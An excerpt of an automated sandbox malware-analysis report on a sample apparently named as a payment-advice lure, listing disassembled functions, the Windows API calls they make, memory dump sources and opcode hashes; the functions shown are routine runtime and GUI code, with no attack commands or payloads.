                          • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                          • Opcode Fuzzy Hash: 89f1a50a5f3f04ab4eb1e3bf6fc47514f3819a61a53c7cc8dd854e7388be254d
                          • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                          Function 004555D6 Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(?), ref: 0045564E
                          • DeleteObject.GDI32(?), ref: 0045565C
                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: DeleteDestroyObject$IconWindow
                          • String ID:
                          • API String ID: 3349847261-0
                          • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                          • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                          • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                          • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                          Function 0044B600 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                          Download Yara Rule
                          APIs
                          • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                          • String ID:
                          • API String ID: 2223660684-0
                          • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                          • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                          • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                          • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                          Function 00447268 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                            • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                            • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                          • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                          • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                          • EndPath.GDI32(?), ref: 004472B0
                          • StrokePath.GDI32(?), ref: 004472BE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                          • String ID:
                          • API String ID: 2783949968-0
                          • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                          • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                          • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                          • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                          Function 00417D0E Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 00417D1A
                            • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                            • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                          • __getptd.LIBCMT ref: 00417D31
                          • __amsg_exit.LIBCMT ref: 00417D3F
                          • __lock.LIBCMT ref: 00417D4F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                          • String ID:
                          • API String ID: 3521780317-0
                          • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                          • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                          • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                          • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                          Function 00471144 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          • GetDesktopWindow.USER32 ref: 00471144
                          • GetDC.USER32(00000000), ref: 0047114D
                          • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                          • ReleaseDC.USER32(00000000,?), ref: 0047117B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                          • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                          • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                          • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                          Function 00471102 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          • GetDesktopWindow.USER32 ref: 00471102
                          • GetDC.USER32(00000000), ref: 0047110B
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                          • ReleaseDC.USER32(00000000,?), ref: 00471139
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                          • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                          • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                          • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                          Function 004389A1 Relevance: 6.0, APIs: 4, Instructions: 27threadwindowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                          • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                          • GetCurrentThreadId.KERNEL32 ref: 004389DA
                          • AttachThreadInput.USER32(00000000), ref: 004389E1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                          • String ID:
                          • API String ID: 2710830443-0
                          • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                          • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                          • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                          • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                          Function 004390C2 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                          • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                            • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                            • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                          • String ID:
                          • API String ID: 146765662-0
                          • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                          • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                          • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                          • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                          Function 0041405D Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMON
                          Download Yara Rule
                          APIs
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                            • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                          • __getptd_noexit.LIBCMT ref: 00414080
                          • __freeptd.LIBCMT ref: 0041408A
                          • ExitThread.KERNEL32 ref: 00414093
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                          • String ID:
                          • API String ID: 3182216644-0
                          • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                          • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                          • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                          • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                          Function 0046EDC6 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 383COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: BuffCharLower
                          • String ID: $8'I
                          • API String ID: 2358735015-3608026889
                          • Opcode ID: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                          • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                          • Opcode Fuzzy Hash: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                          • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                          Function 00478373 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                          Download Yara Rule
                          APIs
                          • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                            • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                            • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                          • String ID: AutoIt3GUI$Container
                          • API String ID: 3380330463-3941886329
                          • Opcode ID: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                          • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                          • Opcode Fuzzy Hash: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                          • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                          Function 004099A8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 00409A61
                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                          • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                          • String ID: 0vH
                          • API String ID: 1143807570-3662162768
                          • Opcode ID: 3b8ec82d58c38576b00ff22988a0e650aa58911ac6743af60d2de49a63bf73c2
                          • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                          • Opcode Fuzzy Hash: 3b8ec82d58c38576b00ff22988a0e650aa58911ac6743af60d2de49a63bf73c2
                          • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                          Function 00466587 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID: HH$HH
                          • API String ID: 0-1787419579
                          • Opcode ID: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                          • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                          • Opcode Fuzzy Hash: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                          • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                          Function 00444652 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104windowCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          • Opcode ID: b197b12ebb791d0d124b954fc3f56ec3733aa4353655cd8c64cc0c5a1933b8ad
                          • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                          • Opcode Fuzzy Hash: b197b12ebb791d0d124b954fc3f56ec3733aa4353655cd8c64cc0c5a1933b8ad
                          • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                          Function 00448358 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: '
                          • API String ID: 3850602802-1997036262
                          • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                          • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                          • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                          • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                          Function 00444571 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                          • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                          • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                          • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                          Function 0045126C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
